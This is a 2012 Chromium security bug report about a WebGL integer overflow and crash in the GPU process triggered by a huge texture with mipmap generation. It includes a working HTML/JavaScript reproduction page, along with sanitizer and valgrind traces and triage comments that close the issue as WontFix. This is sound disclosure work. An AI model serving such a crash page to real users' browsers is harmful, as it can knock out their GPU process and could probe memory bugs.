New issue
Advanced search Search tips
Note: Color blocks (like or ) mean that a user may not be available. Tooltip shows the reason.
Starred by 1 user

Issue metadata

Status: WontFix
Owner:
Last visit 18 days ago
Closed: Sep 2012
Cc:
Components:
EstimatedDays: ----
NextAction: ----
OS: All
Pri: 1
Type: Bug-Security



Sign in to add a comment
link

Issue 145648: Security: webgl gpu process integer overflow with large mipmap, attempting free on address which was not malloc()-ed

Reported by miau...@gmail.com, Aug 30 2012

Issue description

VULNERABILITY DETAILS
webgl gpu process integer overflow with large mipmap, attempting free on address which was not malloc()-ed

crashes non-asan gpu process also

VERSION
Chrome Version: dev
Operating System: linux 64bit

REPRODUCTION CASE
<html>
  <head>
    <script>
      onload = function() {
        var gl = document.querySelector('canvas').getContext('experimental-webgl')
        var tex = gl.createTexture();
        gl.bindTexture(gl.TEXTURE_2D, tex);
        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, 1, 1, 0, gl.RGBA, gl.UNSIGNED_BYTE, null);
        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, Math.pow(2,32), Math.pow(2,12), 0, gl.RGBA, gl.UNSIGNED_BYTE, null);
        gl.generateMipmap(gl.TEXTURE_2D);
        setTimeout("window.close()", 1000)
      }
    </script>
  </head>
  <body>
    <canvas></canvas>
  </body>
</html>


FOR CRASHES, PLEASE INCLUDE THE FOLLOWING ADDITIONAL INFORMATION
Type of crash: asan + gpu
Crash State: 

==15120== ERROR: AddressSanitizer attempting free on address which was not malloc()-ed: 0x7fffde132780
    #0 0x55555f2a77b0 in __interceptor_free ??:0
    #1 0x7fffe9973455 in ?? ??:0
0x7fffde132780 is located 124 bytes inside of 33554432-byte region [0x7fffde132704,0x7fffe0132704)
freed by thread T0 here:
    #0 0x200000001
    #1 0x200000001
previously allocated by thread T0 here:
    #0 0x200000001
    #1 0x200000001
 
unfree.txt
1.6 KB View Download
unfree.html
598 bytes View Download

Comment 1 by tsepez@chromium.org, Aug 30 2012

Cc: zmo@chromium.org
Labels: -Pri-0 -Area-Undefined Pri-1 Area-Internals Mstone-22 OS-All Feature-GPU-WebGL SecSeverity-High
Owner: kbr@chromium.org

Comment 2 by infe...@chromium.org, Sep 5 2012

Cc: vangelis@chromium.org

Comment 3 by scarybea...@gmail.com, Sep 6 2012

Labels: ReleaseBlock-Stable

Comment 4 by zmo@chromium.org, Sep 6 2012

Cc: -zmo@chromium.org kbr@chromium.org
Owner: zmo@chromium.org
Status: Started
I'll take this one also

Comment 5 by infe...@chromium.org, Sep 6 2012

Cc: gman@chromium.org

Comment 6 by miau...@gmail.com, Sep 6 2012

=================================================================
==8808== ERROR: AddressSanitizer crashed on unknown address 0x000000000050 (pc 0x7fffe9e074cc sp 0x7fffffff7930 bp 0x000000000000 T0)
AddressSanitizer can not provide additional info.
    #0 0x7fffe9e074cc (/usr/lib/x86_64-linux-gnu/dri/i965_dri.so+0x2b4cc)

intel crash

Comment 7 by gman@chromium.org, Sep 7 2012

Owner: gman@chromium.org
I haven't been able to repo this but it's possible this CL fixes it
http://codereview.chromium.org/10916165/

Comment 9 by infe...@chromium.org, Sep 7 2012

Labels: -Restrict-View-SecurityTeam Restrict-View-SecurityNotify Merge-Approved
Status: FixUnreleased
miaubiz, can you try on trunk so see if it fixes for you ?

Comment 10 by miau...@gmail.com, Sep 8 2012

not fixed in 155560.

fwiw, on intel this crashes as a nullptr at 0x50, and it crashes the same with 0 instead of Math.pow(2,32) on the line:

        gl.texImage2D(gl.TEXTURE_2D, 0, gl.RGBA, Math.pow(2,32), Math.pow(2,12), 0, gl.RGBA, gl.UNSIGNED_BYTE, null);

so this maybe a false positive :|

Comment 11 by scarybea...@gmail.com, Sep 9 2012

Labels: -Merge-Approved
Status: WontFix
@miaubiz:

Q1) What driver was in is for #c0 ? Your note in #c10 implies that this is always a NULL in Intel, so were you using a different driver initially?

Q2) In #c0 you also stated, "crashes non-asan gpu process also". Do you have a crash ID for that?

Q3) Anything interesting if you try valgrind? Something like --gpu-launcher=valgrind ?

Comment 12 by miau...@gmail.com, Sep 9 2012

@scarybeasts: #c0 is on llvmpipe.

I don't have a crashid for it.  it looks like this in kern.log:

Sep  9 10:19:03 kernel: [1084557.692316] Chrome_InProcGp[16819]: segfault at 20000000a ip 0000555555bb6b61 sp 00007fffdd722670 error 4 in chromium-browser[555555554000+4dd4000]

this is with --gpu-launcher=valgrind, but it's a tcmalloced build:

third_party/tcmalloc/chromium/src/free_list.cc:117] Memory corruption detected. 
 Invalid write of size 1
    at 0x764FE0: tcmalloc::Abort() (in  /chrome-linux/chromium-browser)
    by 0x76C92B: tcmalloc::Log(tcmalloc::LogMode, char const*, int, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem) (in  /chrome-linux/chromium-browser)
    by 0x76ABF0: tcmalloc::FL_Next(void*) (in  /chrome-linux/chromium-browser)
    by 0x76ACE0: tcmalloc::FL_Pop(void**) (in  /chrome-linux/chromium-browser)
    by 0x385E096: operator new(unsigned long) (in  /chrome-linux/chromium-browser)
    by 0x12D45985: std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> >::_M_insert_aux(__gnu_cxx::__normal_iterator<llvm::MachineInstr**, std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> > >, llvm::MachineInstr* const&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B6D3D: llvm::LiveVariables::HandleVirtRegUse(unsigned int, llvm::MachineBasicBlock*, llvm::MachineInstr*) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B7E6F: llvm::LiveVariables::runOnMachineFunction(llvm::MachineFunction&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263A68: llvm::FPPassManager::runOnFunction(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263BB0: llvm::FunctionPassManagerImpl::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263C90: llvm::FunctionPassManager::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13358FFD: llvm::JIT::jitTheFunction(llvm::Function*, llvm::MutexGuard const&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
  Address 0x39 is not stack'd, malloc'd or (recently) free'd
 
 Process terminating with default action of signal 11 (SIGSEGV)
  Access not within mapped region at address 0x39
    at 0x764FE0: tcmalloc::Abort() (in  /chrome-linux/chromium-browser)
    by 0x76C92B: tcmalloc::Log(tcmalloc::LogMode, char const*, int, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem, tcmalloc::LogItem) (in  /chrome-linux/chromium-browser)
    by 0x76ABF0: tcmalloc::FL_Next(void*) (in  /chrome-linux/chromium-browser)
    by 0x76ACE0: tcmalloc::FL_Pop(void**) (in  /chrome-linux/chromium-browser)
    by 0x385E096: operator new(unsigned long) (in  /chrome-linux/chromium-browser)
    by 0x12D45985: std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> >::_M_insert_aux(__gnu_cxx::__normal_iterator<llvm::MachineInstr**, std::vector<llvm::MachineInstr*, std::allocator<llvm::MachineInstr*> > >, llvm::MachineInstr* const&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B6D3D: llvm::LiveVariables::HandleVirtRegUse(unsigned int, llvm::MachineBasicBlock*, llvm::MachineInstr*) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x130B7E6F: llvm::LiveVariables::runOnMachineFunction(llvm::MachineFunction&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263A68: llvm::FPPassManager::runOnFunction(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263BB0: llvm::FunctionPassManagerImpl::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13263C90: llvm::FunctionPassManager::run(llvm::Function&) (in /usr/lib/x86_64-linux-gnu/libLLVM-3.0.so.1)
    by 0x13358FFD: llvm::JIT::jitTheFunction(llvm::Function*, llvm::MutexGuard const&) (in /usr/lib/x86_64-

Comment 13 by scarybea...@gmail.com, Sep 14 2012

Confirm the NULL crash on Intel via valgrind:

==27855== Invalid read of size 8
==27855==    at 0x153AC4CC: intel_miptree_map (in /usr/lib/x86_64-linux-gnu/dri/i965_dri.so)
==27855==    by 0x153B148A: ??? (in /usr/lib/x86_64-linux-gnu/dri/i965_dri.so)
==27855==    by 0x156ED337: _mesa_generate_mipmap (in /usr/lib/x86_64-linux-gnu/dri/libdricore.so)
==27855==    by 0x1580C106: _mesa_meta_GenerateMipmap (in /usr/lib/x86_64-linux-gnu/dri/libdricore.so)
==27855==    by 0x156C4FDD: _mesa_GenerateMipmapEXT (in /usr/lib/x86_64-linux-gnu/dri/libdricore.so)
==27855==    by 0x3B98FD1: gpu::gles2::GLES2DecoderImpl::DoGenerateMipmap(unsigned int) (gles2_cmd_decoder.cc:3602)
==27855==    by 0x3BAE8DF: gpu::gles2::GLES2DecoderImpl::HandleGenerateMipmap(unsigned int, gpu::gles2::GenerateMipmap const&) (gles2_cmd_decoder_autogen.h:772)
==27855==    by 0x3B961A1: gpu::gles2::GLES2DecoderImpl::DoCommand(unsigned int, unsigned int, void const*) (in /home/chris/chrome/src/out/Debug/chrome)
==27855==    by 0x3BF9F45: gpu::CommandParser::ProcessCommand() (cmd_parser.cc:72)
==27855==    by 0x3BBB851: gpu::GpuScheduler::PutChanged() (gpu_scheduler.cc:81)
==27855==    by 0x22B0236: GpuCommandBufferStub::PutChanged() (gpu_command_buffer_stub.cc:675)
==27855==    by 0x22B8671: base::internal::RunnableAdapter<void (GpuCommandBufferStub::*)()>::Run(GpuCommandBufferStub*) (bind_internal.h:134)
==27855==  Address 0x50 is not stack'd, malloc'd or (recently) free'd

Comment 14 by scarybea...@gmail.com, Sep 14 2012

@miaubiz: what's your machine setup that results in llvmpipe being used? Any weird GPU flags?

I basically want to make sure our blacklist is in order and that people aren't going to be exposed to llvmpipe bugginess in their "out-of-the-box" configs. We can re-open if anything interesting comes from the conversation.

I wonder if the attacker can force the use of llvmpipe by deliberating using GL extensions or capabilities unsupported by the underlying driver / hardware?

Comment 15 by kbr@chromium.org, Sep 14 2012

Comment 17 by bugdroid1@chromium.org, Mar 10 2013

Project Member
Labels: -Type-Security -Area-Internals -Mstone-22 -Feature-GPU-WebGL -SecSeverity-High Cr-Internals-GPU-WebGL M-22 Cr-Internals Security-Severity-High Type-Bug-Security

Comment 18 by bugdroid1@chromium.org, Mar 21 2013

Project Member
Labels: -Security-Severity-High Security_Severity-High

Comment 19 by bugdroid1@chromium.org, Apr 10 2013

Project Member
Labels: -Cr-Internals-GPU-WebGL Cr-Blink-WebGL

Comment 20 by jsc...@chromium.org, Nov 18 2013

Labels: -Restrict-View-SecurityNotify
Bulk release of old security bug reports.

Comment 21 by sheriffbot@chromium.org, Oct 1 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 22 by sheriffbot@chromium.org, Oct 2 2016

Project Member
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Comment 23 by mbarbe...@chromium.org, Oct 2 2016

Labels: allpublic

Sign in to add a comment